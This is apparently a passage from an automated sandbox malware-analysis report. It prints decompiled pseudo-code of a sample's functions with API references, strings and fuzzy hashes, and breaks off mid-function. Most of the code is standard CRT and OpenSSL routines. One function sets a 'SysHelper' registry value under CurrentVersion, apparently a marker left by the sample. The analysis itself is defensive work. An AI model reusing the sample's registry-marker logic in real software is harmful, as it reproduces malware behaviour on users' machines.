																			_t42 = 0;
																			_t59 = _t60 - 1;
																			__eflags = _t59;
																			if(_t59 != 0) {
																				L46:
																				_t42 = 0;
																				__eflags = 0;
																				do {
																					 *_t73 = 0;
																					_t73 = _t73 + 4;
																					_t59 = _t59 - 1;
																					__eflags = _t59;
																				} while (_t59 != 0);
																			}
																			_t52 = _t52 & 0x00000003;
																			__eflags = _t52;
																			if(_t52 != 0) {
																				goto L31;
																			} else {
																				L49:
																				return _v60;
																			}
																		}
																	}
																}
															}
														}
														goto L50;
														L35:
														 *_t73 = _t66;
														_t73 = _t73 + 4;
														_t60 = _t60 - 1;
														__eflags = _t60;
													} while (_t60 != 0);
													L23:
													_t52 = _t52 & 0x00000003;
													__eflags = _t52;
													if(_t52 == 0) {
														goto L26;
													} else {
														goto L24;
													}
												} else {
													while(1) {
														L24:
														_t42 =  *_t83;
														_t83 = _t83 + 1;
														 *_t73 = _t42;
														_t73 = _t73 + 1;
														__eflags = _t42;
														if(_t42 == 0) {
															break;
														}
														_t52 = _t52 - 1;
														__eflags = _t52;
														if(_t52 != 0) {
															continue;
														} else {
															L26:
															return _v60;
														}
														goto L50;
													}
													L32:
													_t52 = _t52 - 1;
													__eflags = _t52;
													if(_t52 != 0) {
														L31:
														 *_t73 = _t42;
														_t73 = _t73 + 1;
														__eflags = _t73;
														goto L32;
													}
													goto L34;
												}
											}
										}
									}
								}
							} else {
								L10:
								_t34 = E00425208(__eflags);
								_t81 = 0x16;
								 *_t34 = _t81;
								E004242D2();
								_t36 = _t81;
								L11:
								return _t36;
							}
						} else {
							_t48 = _t79;
							goto L5;
						}
					} else {
						_t49 = E00428C96(0x86, 1);
						 *(_t78 + 0x24) = _t49;
						__eflags = _t49;
						if(_t49 != 0) {
							goto L7;
						} else {
							_t48 = "Visual C++ CRT: Not enough memory to complete call to strerror.";
							L5:
							goto L6;
						}
					}
				} else {
					_t48 = "Visual C++ CRT: Not enough memory to complete call to strerror.";
					L6:
					return _t48;
				}
				L50:
			}

0x004c5d39
0x004c5d3a
0x004c5d42
0x004c5d46
0x004c5d4f
0x004c5d58
0x004c5d5b
0x004c5d78
0x004c5d7b
0x004c5d86
0x004c5d8e
0x004c5d90
0x004c5d96
0x004c5d97
0x004c5d98
0x004c5d99
0x004c5d9a
0x004c5d9b
0x004c5da0
0x004c5da1
0x004c5da4
0x004c5da8
0x004c5da9
0x004c5dbf
0x004c5dc2
0x004c5dc4
0x00000000
0x004c5dc6
0x004c5dc6
0x004c5dd8
0x004c5de0
0x004c5de2
0x00000000
0x004c5de4
0x004c5de6
0x004c5de7
0x004c5de8
0x004c5de9
0x004c5dea
0x004c5deb
0x004c5df0
0x004c5df1
0x004c5df2
0x004c5df3
0x004c5df4
0x004c5df5
0x004c5df6
0x004c5df7
0x004c5df8
0x004c5df9
0x004c5dfa
0x004c5dfb
0x004c5dfc
0x004c5dfd
0x004c5dfe
0x004c5dff
0x004c5e00
0x004c5e04
0x004c5e05
0x004c5e07
0x004c5e9f
0x004c5ea4
0x004c5e0d
0x004c5e0d
0x004c5e0e
0x004c5e0f
0x004c5e11
0x004c5e15
0x004c5e1b
0x004c5e1f
0x004c5e2c
0x004c5e2c
0x004c5e2e
0x004c5e31
0x004c5e33
0x004c5e36
0x004c5e36
0x004c5e39
0x00000000
0x00000000
0x004c5e3b
0x004c5e3d
0x004c5e6e
0x004c5e74
0x004c5e8c
0x004c5e8c
0x004c5e8e
0x004c5e8e
0x004c5e91
0x00000000
0x00000000
0x00000000
0x00000000
0x004c5e76
0x004c5e76
0x004c5e76
0x004c5e78
0x004c5e7b
0x004c5e7b
0x004c5e7e
0x00000000
0x00000000
0x004c5e84
0x004c5e8a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004c5e8a
0x00000000
0x004c5e76
0x004c5e3f
0x004c5e3f
0x004c5e45
0x00000000
0x004c5e47
0x004c5e47
0x004c5e49
0x004c5e49
0x004c5e4c
0x00000000
0x00000000
0x00000000
0x00000000
0x004c5e4c
0x004c5e45
0x00000000
0x004c5e3d
0x00000000
0x004c5e21
0x004c5e21
0x004c5e21
0x004c5e24
0x004c5eaf
0x004c5eaf
0x004c5ebb
0x004c5ebd
0x004c5ebf
0x004c5ec2
0x004c5ec7
0x00000000
0x004c5ec9
0x004c5ec9
0x004c5ecb
0x004c5ef9
0x004c5efb
0x00000000
0x004c5ecd
0x004c5ecd
0x004c5ecf
0x004c5ef5
0x00000000
0x004c5ed1
0x004c5ed1
0x004c5ed7
0x004c5eeb
0x00000000
0x004c5ed9
0x004c5ed9
0x004c5edf
0x00000000
0x004c5ee1
0x004c5ee1
0x004c5efd
0x004c5efd
0x004c5f00
0x004c5f02
0x004c5f02
0x004c5f05
0x004c5f07
0x004c5f07
0x004c5f07
0x004c5f09
0x004c5f09
0x004c5f0b
0x004c5f0e
0x004c5f0e
0x004c5f0e
0x004c5f09
0x004c5f13
0x004c5f13
0x004c5f16
0x00000000
0x004c5f1c
0x004c5f1c
0x004c5f23
0x004c5f23
0x004c5f16
0x004c5edf
0x004c5ed7
0x004c5ecf
0x004c5ecb
0x00000000
0x004c5ea5
0x004c5ea5
0x004c5ea7
0x004c5eaa
0x004c5eaa
0x004c5eaa
0x004c5e4e
0x004c5e4e
0x004c5e4e
0x004c5e51
0x00000000
0x00000000
0x00000000
0x00000000
0x004c5e2a
0x004c5e53
0x004c5e53
0x004c5e53
0x004c5e55
0x004c5e58
0x004c5e5a
0x004c5e5d
0x004c5e5f
0x00000000
0x00000000
0x004c5e61
0x004c5e61
0x004c5e64
0x00000000
0x004c5e66
0x004c5e66
0x004c5e6d
0x004c5e6d
0x00000000
0x004c5e64
0x004c5e98
0x004c5e98
0x004c5e98
0x004c5e9b
0x004c5e93
0x004c5e93
0x004c5e95
0x004c5e95
0x00000000
0x004c5e95
0x00000000
0x004c5e9e
0x004c5e24
0x004c5e1f
0x004c5e07
0x004c5de2
0x004c5dab
0x004c5dab
0x004c5dab
0x004c5db2
0x004c5db3
0x004c5db5
0x004c5dba
0x004c5dbc
0x004c5dbe
0x004c5dbe
0x004c5d92
0x004c5d92
0x00000000
0x004c5d92
0x004c5d5d
0x004c5d60
0x004c5d65
0x004c5d6a
0x004c5d6c
0x00000000
0x004c5d6e
0x004c5d6e
0x004c5d73
0x00000000
0x004c5d74
0x004c5d6c
0x004c5d48
0x004c5d48
0x004c5d75
0x004c5d77
0x004c5d77
0x00000000

APIs

__getptd_noexit.LIBCMT ref: 004C5D3D

Part of subcall function 0042501F: GetLastError.KERNEL32(?,i;B,0042520D,00420CE9,?,?,00423B69,?), ref: 00425021
Part of subcall function 0042501F: __calloc_crt.LIBCMT ref: 00425042
Part of subcall function 0042501F: __initptd.LIBCMT ref: 00425064
Part of subcall function 0042501F: GetCurrentThreadId.KERNEL32 ref: 0042506B
Part of subcall function 0042501F: SetLastError.KERNEL32(00000000,i;B,0042520D,00420CE9,?,?,00423B69,?), ref: 00425083

__calloc_crt.LIBCMT ref: 004C5D60
__get_sys_err_msg.LIBCMT ref: 004C5D7E
__invoke_watson.LIBCMT ref: 004C5D9B
__get_sys_err_msg.LIBCMT ref: 004C5DCD
__invoke_watson.LIBCMT ref: 004C5DEB

Strings

Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 004C5D48, 004C5D6E

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: ErrorLast__calloc_crt__get_sys_err_msg__invoke_watson$CurrentThread__getptd_noexit__initptd
String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
API String ID: 2139067377-798102604
Opcode ID: 6565f3eeb2dc9c0597fd8b1228d76a5755e5e4a7eea90c3f78218ec856ed93f0
Instruction ID: efefb7cdb09aa89a66c944e42d5018451410fe076c3b278b171ca9447b521f4c
Opcode Fuzzy Hash: 6565f3eeb2dc9c0597fd8b1228d76a5755e5e4a7eea90c3f78218ec856ed93f0
Instruction Fuzzy Hash: 8E11E935601F2567D7613A66AC05FBF738CDF007A4F50806FFE0696241E629AC8042AD

Uniqueness

Uniqueness Score: -1.00%

Function 0040C6A0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 49
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040C6A0() {
				void* _v8;
				char _v12;
				int _v16;
				int _v20;
				char _t16;

				_v8 = 0;
				_t16 = RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion", 0, 0xf003f,  &_v8);
				if(_t16 != 0) {
					L4:
					return 1;
				} else {
					_v12 = _t16;
					_v20 = 4;
					_v16 = 4;
					if(RegQueryValueExW(_v8, L"SysHelper", 0,  &_v20,  &_v12,  &_v16) != 0) {
						_v12 = 1;
						RegSetValueExW(_v8, L"SysHelper", 0, 4,  &_v12, 4);
						RegCloseKey(_v8);
						goto L4;
					} else {
						RegCloseKey(_v8);
						return 0;
					}
				}
			}

0x0040c6a9
0x0040c6c2
0x0040c6ca
0x0040c734
0x0040c739
0x0040c6cc
0x0040c6cc
0x0040c6d6
0x0040c6e1
0x0040c6fb
0x0040c711
0x0040c725
0x0040c72e
0x00000000
0x0040c6fd
0x0040c700
0x0040c70b
0x0040c70b
0x0040c6fb

APIs

RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,?), ref: 0040C6C2
RegQueryValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,?), ref: 0040C6F3
RegCloseKey.ADVAPI32(00000000), ref: 0040C700
RegSetValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,00000004), ref: 0040C725
RegCloseKey.ADVAPI32(00000000), ref: 0040C72E

Strings

SysHelper, xrefs: 0040C6EB, 0040C71D
Software\Microsoft\Windows\CurrentVersion, xrefs: 0040C6B8

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: CloseValue$OpenQuery
String ID: Software\Microsoft\Windows\CurrentVersion$SysHelper
API String ID: 3962714758-1667468722
Opcode ID: 1b3e89e7960631348278952d172054be4d8a3531237e516afd507403cd6f8071
Instruction ID: 83d53c3b81c5c3826f22504a9cab54a14a7287ca0244f3776693af22b4817dfa
Opcode Fuzzy Hash: 1b3e89e7960631348278952d172054be4d8a3531237e516afd507403cd6f8071
Instruction Fuzzy Hash: 60112D7594020CFBDB109F91CC86FEEBB78EB04708F2041A5FA04B22A1D7B55B14AB58

Uniqueness

Uniqueness Score: -1.00%

Function 004573F0 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 251
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 88%

			E004573F0(signed int _a4, signed int _a8, signed int _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24, char _a28, signed int _a60, intOrPtr _a68, char _a72, signed int _a76, signed int _a80, signed int _a84, signed int _a88, intOrPtr _a92, signed int _a96, intOrPtr _a100, signed char _a104) {
				signed int _v0;
				signed int _v4;
				intOrPtr _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t129;
				intOrPtr _t135;
				signed int _t136;
				signed int _t140;
				void* _t141;
				signed int _t143;
				signed int _t148;
				void* _t150;
				intOrPtr _t154;
				signed char _t160;
				char _t166;
				intOrPtr _t170;
				signed int _t174;
				signed int _t181;
				signed int* _t182;
				intOrPtr _t184;
				intOrPtr _t185;
				void* _t186;
				intOrPtr _t187;
				signed char _t189;
				signed int _t192;
				signed int* _t196;
				signed int _t199;
				intOrPtr* _t200;
				signed int _t203;
				signed int _t205;
				signed int _t206;
				void* _t208;
				intOrPtr _t209;
				signed int _t213;
				intOrPtr _t214;
				intOrPtr* _t217;
				signed int _t220;
				signed int _t221;
				void* _t223;
				signed int _t224;
				signed int _t225;
				signed int _t226;
				signed int _t231;
				intOrPtr* _t232;
				signed int* _t233;
				void* _t235;
				signed int _t240;
				void* _t241;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				intOrPtr _t249;
				intOrPtr _t250;
				signed int _t253;
				signed int _t257;
				void* _t262;
				signed char _t268;

				E0042F7C0(0x40);
				_t129 =  *0x50ad20; // 0x934ff656
				_a60 = _t129 ^ _t253;
				_t187 = _a100;
				_t181 = _a84;
				_t249 = _a68;
				_a28 = _a72;
				_a8 = _a76;
				_v0 = _a80;
				_t220 = 0;
				_a4 = 0x4ffca4;
				_a12 = 0;
				_t188 =  <  ? 0 : _t187;
				_t213 = _a88;
				_a100 =  <  ? 0 : _t187;
				_t189 = _a104;
				if((_t189 & 0x00000040) == 0) {
					_t257 = _t213;
					if(_t257 > 0 || _t257 >= 0 && _t181 >= 0) {
						__eflags = _t189 & 0x00000002;
						if((_t189 & 0x00000002) == 0) {
							__eflags = _t189 & 0x00000004;
							_a16 = 0x20;
							_t179 =  !=  ? _a16 : 0;
							_a12 =  !=  ? _a16 : 0;
						} else {
							_a12 = 0x2b;
						}
					} else {
						_t181 =  ~_t181;
						_a12 = 0x2d;
						asm("adc edx, eax");
						_t213 =  ~_t213;
					}
				}
				_t135 = _a92;
				if((_t189 & 0x00000008) != 0) {
					if(_t135 != 8) {
						__eflags = _a92 - 0x10;
						_t178 =  !=  ? 0x4ffca4 : "0x";
						_a4 =  !=  ? 0x4ffca4 : "0x";
						_t135 = _a92;
					} else {
						_a4 = "0";
					}
				}
				_a16 = "0123456789abcdef";
				_t230 =  !=  ? 1 : _t220;
				_t262 =  !=  ? 1 : _t220;
				_t192 =  ==  ? _a16 : "0123456789ABCDEF";
				_t231 = _t192;
				while(1) {
					_t136 = E0043AE20(_t181, _t213, _t135, 0);
					_a4 = _t181;
					_t181 = _t136;
					 *((char*)(_t253 + _t220 + 0x30)) =  *((intOrPtr*)(_t192 + _t231));
					_t220 = _t220 + 1;
					_t192 = _t181 | _t213;
					if(_t192 == 0) {
						break;
					}
					_t135 = _a92;
					if(_t220 < 0x1a) {
						continue;
					}
					break;
				}
				_t232 = _a4;
				_a16 = _t220;
				if(_t220 != 0x1a) {
					if(__eflags >= 0) {
						E0042AC83();
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						E0042F7C0(4);
						_t140 = _a8;
						_t214 = 0;
						__eflags = _t140;
						_v16 = 0;
						_t196 =  !=  ? _t140 : "<NULL>";
						_t141 = 0;
						_a8 = _t196;
						__eflags =  *_t196;
						if( *_t196 != 0) {
							do {
								_t141 = _t141 + 1;
								__eflags =  *(_t141 + _t196);
							} while ( *(_t141 + _t196) != 0);
						}
						_t199 =  <  ? _t214 : _a16 - _t141;
						__eflags = _a12 & 0x00000001;
						_a16 = _t199;
						if((_a12 & 0x00000001) != 0) {
							_t199 =  ~_t199;
							_a16 = _t199;
						}
						_push(_t181);
						_t182 = _v0;
						_push(_t249);
						_t250 = _v8;
						_push(_t232);
						_t233 = _a4;
						_push(_t220);
						_t221 = _v4;
						__eflags = _t199;
						if(_t199 > 0) {
							while(1) {
								__eflags = _t214 - _a20;
								if(_t214 >= _a20) {
									goto L71;
								}
								__eflags = _t221;
								if(_t221 != 0) {
									__eflags =  *_t182 -  *_t233;
									if( *_t182 >=  *_t233) {
										do {
											__eflags =  *_t221;
											if( *_t221 != 0) {
												 *_t233 =  *_t233 + 0x400;
												__eflags =  *_t233;
												_t150 = E00454F30( *_t221,  *_t233, ".\\crypto\\bio\\b_print.c", 0x2ed);
												_t253 = _t253 + 0x10;
												 *_t221 = _t150;
											} else {
												__eflags =  *_t233;
												if( *_t233 == 0) {
													 *_t233 = 0x400;
												}
												 *_t221 = E00454E50( *_t233, ".\\crypto\\bio\\b_print.c", 0x2e5);
												_t253 = _t253 + 0xc;
												_t206 =  *_t182;
												__eflags = _t206;
												if(_t206 != 0) {
													E0042D8D0(_t152, _v0, _t206);
													_t253 = _t253 + 0xc;
												}
												_v0 = 0;
											}
											__eflags =  *_t182 -  *_t233;
										} while ( *_t182 >=  *_t233);
										_t214 = _v16;
									}
								}
								_t203 =  *_t182;
								__eflags = _t203 -  *_t233;
								if(_t203 <  *_t233) {
									_t148 = _v0;
									__eflags = _t148;
									if(_t148 == 0) {
										 *((char*)(_t203 +  *_t221)) = 0x20;
									} else {
										 *((char*)(_t148 + _t203)) = 0x20;
									}
									 *_t182 =  *_t182 + 1;
									__eflags =  *_t182;
								}
								_t214 = _t214 + 1;
								_t205 = _a16 - 1;
								_v16 = _t214;
								_a16 = _t205;
								__eflags = _t205;
								if(_t205 > 0) {
									continue;
								}
								goto L71;
							}
						}
						L71:
						_t200 = _a8;
						_t143 =  *_t200;
						__eflags = _t143;
						if(_t143 != 0) {
							_a8 = _t200 - _t214;
							while(1) {
								__eflags = _t214 - _a20;
								if(_t214 >= _a20) {
									goto L75;
								}
								E00456F70(_t250, _t221, _t182, _t233, _t143);
								_t253 = _t253 + 0x14;
								_t214 = _v16 + 1;
								_v16 = _t214;
								_t143 =  *((intOrPtr*)(_a8 + _t214));
								__eflags = _t143;
								if(_t143 != 0) {
									continue;
								}
								goto L75;
							}
						}
						L75:
						__eflags = _a16;
						if(_a16 < 0) {
							while(1) {
								__eflags = _t214 - _a20;
								if(_t214 >= _a20) {
									goto L78;
								}
								_t143 = E00456F70(_t250, _t221, _t182, _t233, 0x20);
								_t253 = _t253 + 0x14;
								_t214 = _v16 + 1;
								_t124 =  &_a16;
								 *_t124 = _a16 + 1;
								__eflags =  *_t124;
								_v16 = _t214;
								if( *_t124 < 0) {
									continue;
								}
								goto L78;
							}
						}
						L78:
						return _t143;
					} else {
						goto L18;
					}
				} else {
					_t220 = 0x19;
					_a16 = 0x19;
					L18:
					_t184 = _a100;
					_t217 = _t232;
					 *((char*)(_t253 + _t220 + 0x30)) = 0;
					_t208 = _t184 - _t220;
					_t235 = _t217 + 1;
					do {
						_t154 =  *_t217;
						_t217 = _t217 + 1;
					} while (_t154 != 0);
					_t218 = _t217 - _t235;
					_t156 =  >=  ? _t184 : _t220;
					_t237 = _a96 - ( >=  ? _t184 : _t220);
					_t268 = _a12;
					_t238 = _a96 - ( >=  ? _t184 : _t220) - (_t268 != 0);
					_t209 =  <  ? 0 : _t208;
					_t239 = _a96 - ( >=  ? _t184 : _t220) - (_t268 != 0) - _t217 - _t235;
					_a24 = _t209;
					_t240 =  <  ? 0 : _a96 - ( >=  ? _t184 : _t220) - (_t268 != 0) - _t217 - _t235;
					_t160 = _a104;
					_a96 = _t240;
					if((_t160 & 0x00000010) != 0) {
						_t246 =  >=  ? _t209 : _t240;
						_a24 =  >=  ? _t209 : _t240;
						_t240 = 0;
						_a96 = 0;
					}
					if((_t160 & 0x00000001) != 0) {
						_t240 =  ~_t240;
						_a96 = _t240;
					}
					_t64 =  &_a28; // 0x456c55
					_t185 =  *_t64;
					if(_t240 > 0) {
						_t226 = _a8;
						do {
							E00456F70(_t249, _t185, _t226, _v0, 0x20);
							_t240 = _t240 - 1;
							_t253 = _t253 + 0x14;
						} while (_t240 > 0);
						_t220 = _a16;
						_a96 = _t240;
					}
					_t161 = _a12;
					if(_a12 != 0) {
						E00456F70(_t249, _t185, _a8, _v0, _t161);
						_t253 = _t253 + 0x14;
					}
					_t163 =  *_a4;
					if( *_a4 != 0) {
						_t245 = _a8;
						_t225 = _v0;
						do {
							E00456F70(_t249, _t185, _t245, _t225, _t163);
							_t253 = _t253 + 0x14;
							_t174 = _a4 + 1;
							_a4 = _t174;
							_t163 =  *_t174;
						} while ( *_t174 != 0);
						_t240 = _a96;
						_t220 = _a16;
					}
					if(_a24 > 0) {
						_t244 = _a8;
						_t224 = _v0;
						do {
							E00456F70(_t249, _t185, _t244, _t224, 0x30);
							_t253 = _t253 + 0x14;
							_t170 = _a24 - 1;
							_a24 = _t170;
						} while (_t170 > 0);
						_t240 = _a96;
						_t220 = _a16;
					}
					if(_t220 > 0) {
						_t243 = _a8;
						do {
							_t166 =  *((char*)(_t253 + _t220 + 0x2f));
							_t220 = _t220 - 1;
							E00456F70(_t249, _t185, _t243, _v0, _t166);
							_t253 = _t253 + 0x14;
						} while (_t220 > 0);
						_t240 = _a96;
					}
					if(_t240 < 0) {
						_t242 =  ~_t240;
						do {
							E00456F70(_t249, _t185, _a8, _v0, 0x20);
							_t253 = _t253 + 0x14;
							_t242 = _t242 - 1;
						} while (_t242 != 0);
					}
					_pop(_t223);
					_pop(_t241);
					_pop(_t186);
					return E0042A77E(_t186, _a60 ^ _t253, _t218, _t223, _t241);
				}
			}

0x004573f5
0x004573fa
0x00457401
0x0045740b
0x00457410
0x00457415
0x00457419
0x00457422
0x00457430
0x00457434
0x00457438
0x0045743e
0x00457442
0x00457445
0x00457449
0x0045744d
0x00457454
0x00457456
0x00457458
0x00457470
0x00457473
0x0045747f
0x00457482
0x0045748a
0x0045748f
0x00457475
0x00457475
0x00457475
0x00457460
0x00457460
0x00457462
0x0045746a
0x0045746c
0x0045746c
0x00457458
0x00457493
0x0045749a
0x0045749f
0x004574ac
0x004574b6
0x004574b9
0x004574bd
0x004574a1
0x004574a6
0x004574a6
0x0045749f
0x004574c4
0x004574d3
0x004574db
0x004574dd
0x004574e2
0x004574e4
0x004574e9
0x004574ee
0x004574f2
0x004574f7
0x004574fd
0x004574fe
0x00457500
0x00000000
0x00000000
0x00457502
0x00457509
0x00000000
0x00000000
0x00000000
0x00457509
0x0045750b
0x0045750f
0x00457516
0x00457523
0x0045769f
0x004576a4
0x004576a5
0x004576a6
0x004576a7
0x004576a8
0x004576a9
0x004576aa
0x004576ab
0x004576ac
0x004576ad
0x004576ae
0x004576af
0x004576b5
0x004576ba
0x004576be
0x004576c0
0x004576c2
0x004576ca
0x004576cd
0x004576cf
0x004576d3
0x004576d5
0x004576d7
0x004576d7
0x004576d8
0x004576d8
0x004576d7
0x004576e5
0x004576e8
0x004576ed
0x004576f1
0x004576f3
0x004576f5
0x004576f5
0x004576f9
0x004576fa
0x004576fe
0x004576ff
0x00457703
0x00457704
0x00457708
0x00457709
0x0045770d
0x0045770f
0x00457715
0x00457715
0x00457719
0x00000000
0x00000000
0x0045771f
0x00457721
0x00457725
0x00457727
0x00457730
0x00457730
0x00457733
0x00457772
0x00457772
0x00457786
0x0045778b
0x0045778e
0x00457735
0x00457735
0x00457738
0x0045773a
0x0045773a
0x00457751
0x00457753
0x00457756
0x00457758
0x0045775a
0x00457761
0x00457766
0x00457766
0x00457769
0x00457769
0x00457792
0x00457792
0x00457796
0x00457796
0x00457727
0x0045779a
0x0045779c
0x0045779e
0x004577a0
0x004577a3
0x004577a5
0x004577af
0x004577a7
0x004577a7
0x004577a7
0x004577b3
0x004577b3
0x004577b3
0x004577b9
0x004577ba
0x004577bb
0x004577bf
0x004577c3
0x004577c5
0x00000000
0x00000000
0x00000000
0x004577c5
0x00457715
0x004577cb
0x004577cb
0x004577cf
0x004577d1
0x004577d3
0x004577d7
0x004577e0
0x004577e0
0x004577e4
0x00000000
0x00000000
0x004577ee
0x004577f7
0x004577fe
0x004577ff
0x00457803
0x00457806
0x00457808
0x00000000
0x00000000
0x00000000
0x00457808
0x004577e0
0x0045780a
0x0045780a
0x0045780f
0x00457811
0x00457811
0x00457815
0x00000000
0x00000000
0x0045781d
0x00457826
0x00457829
0x0045782a
0x0045782a
0x0045782a
0x0045782e
0x00457832
0x00000000
0x00000000
0x00000000
0x00457832
0x00457811
0x00457834
0x00457839
0x00000000
0x00000000
0x00000000
0x00457518
0x00457518
0x0045751d
0x00457529
0x00457529
0x0045752d
0x00457531
0x00457536
0x00457538
0x00457540
0x00457540
0x00457542
0x00457543
0x00457547
0x00457551
0x00457554
0x00457558
0x0045755f
0x00457565
0x00457568
0x0045756a
0x0045756e
0x00457571
0x00457575
0x0045757b
0x0045757f
0x00457582
0x00457586
0x00457588
0x00457588
0x0045758e
0x00457590
0x00457592
0x00457592
0x00457596
0x00457596
0x0045759c
0x0045759e
0x004575a2
0x004575ab
0x004575b0
0x004575b1
0x004575b4
0x004575b8
0x004575bc
0x004575bc
0x004575c0
0x004575c6
0x004575d3
0x004575d8
0x004575d8
0x004575df
0x004575e3
0x004575e5
0x004575e9
0x004575f0
0x004575f8
0x00457601
0x00457604
0x00457605
0x00457609
0x0045760b
0x0045760f
0x00457613
0x00457613
0x0045761c
0x0045761e
0x00457622
0x00457626
0x0045762c
0x00457635
0x00457638
0x00457639
0x0045763d
0x00457641
0x00457645
0x00457645
0x0045764b
0x0045764d
0x00457651
0x00457651
0x00457656
0x0045765f
0x00457664
0x00457667
0x0045766b
0x0045766b
0x00457671
0x00457673
0x00457675
0x00457681
0x00457686
0x00457689
0x00457689
0x00457675
0x00457690
0x00457691
0x00457693
0x0045769e
0x0045769e

APIs

__aulldvrm.LIBCMT ref: 004574E9

Strings

0123456789ABCDEF, xrefs: 004574D6
0123456789abcdef, xrefs: 004574C4
UlE, xrefs: 00457596, 004575A9, 004575D1, 004575F6, 0045762A, 0045765D, 0045767F
+, xrefs: 00457475
, xrefs: 00457482

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: __aulldvrm
String ID: $+$0123456789ABCDEF$0123456789abcdef$UlE
API String ID: 1302938615-3129329331
Opcode ID: 46cac4d1b6a149b0db06dd79d6caabf4c5257fe28ada6b330817daa996fb75e4
Instruction ID: ba297de4fec08f8b73c8771b24cc4328c1ae3ea447eff3a94226dc6813255680
Opcode Fuzzy Hash: 46cac4d1b6a149b0db06dd79d6caabf4c5257fe28ada6b330817daa996fb75e4
Instruction Fuzzy Hash: D181AEB1A087509FD710CF29A84062BBBE5BFC9755F15092EFD8593312E338DD098B96

Uniqueness

Uniqueness Score: -1.00%

Function 00411B10 Relevance: 10.6, APIs: 7, Instructions: 50
timewindowsleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00411B10() {
				intOrPtr _v8;
				struct tagMSG _v36;
				long _t9;
				long _t11;
				intOrPtr _t19;

				_t1 = timeGetTime() + 0x1388; // 0x1388
				_t19 = _t1;
				_v8 = _t19;
				_t9 = timeGetTime();
				if(_t19 > _t9) {
					do {
						_t11 = PeekMessageW( &_v36, 0, 0, 0, 1);
						if(_t11 == 0) {
							goto L5;
						}
						while(_v36.message != 0x12) {
							DispatchMessageW( &_v36);
							_t11 = PeekMessageW( &_v36, 0, 0, 0, 1);
							if(_t11 != 0) {
								continue;
							}
							goto L5;
						}
						break;
						L5:
						Sleep(0x64);
						_t11 = timeGetTime();
					} while (_v8 > _t11);
					return _t11;
				}
				return _t9;
			}

0x00411b20
0x00411b20
0x00411b26
0x00411b29
0x00411b2d
0x00411b40
0x00411b4c
0x00411b50
0x00000000
0x00000000
0x00411b52
0x00411b5c
0x00411b6a
0x00411b6e
0x00000000
0x00000000
0x00000000
0x00411b6e
0x00000000
0x00411b70
0x00411b72
0x00411b78
0x00411b7a
0x00000000
0x00411b7f
0x00411b85

APIs

timeGetTime.WINMM ref: 00411B1E
timeGetTime.WINMM ref: 00411B29
PeekMessageW.USER32 ref: 00411B4C
DispatchMessageW.USER32 ref: 00411B5C
PeekMessageW.USER32 ref: 00411B6A
Sleep.KERNEL32(00000064), ref: 00411B72
timeGetTime.WINMM ref: 00411B78

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: MessageTimetime$Peek$DispatchSleep
String ID:
API String ID: 3697694649-0
Opcode ID: fcc8413cfddb585fd402253dfe517567f0959867a63999003a9cc793a607e07b
Instruction ID: 47d0c5dc5d1eae46eaa001befe89e32fbe66e83151f6641dec248f991c3ab793
Opcode Fuzzy Hash: fcc8413cfddb585fd402253dfe517567f0959867a63999003a9cc793a607e07b
Instruction Fuzzy Hash: EE017532A40319A6DB2097E59C81FEEB768AB44B40F044066FB04A71D0E664A9418BA9

Uniqueness

Uniqueness Score: -1.00%

Function 004416EB Relevance: 9.1, APIs: 6, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E004416EB(void* __ebx, void* __edx, void* __edi, void* __esi, signed int _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v32;
				signed int _t16;
				intOrPtr _t17;
				signed int _t19;
				signed int _t20;
				signed int _t30;
				intOrPtr* _t35;
				intOrPtr* _t37;
				signed int* _t40;
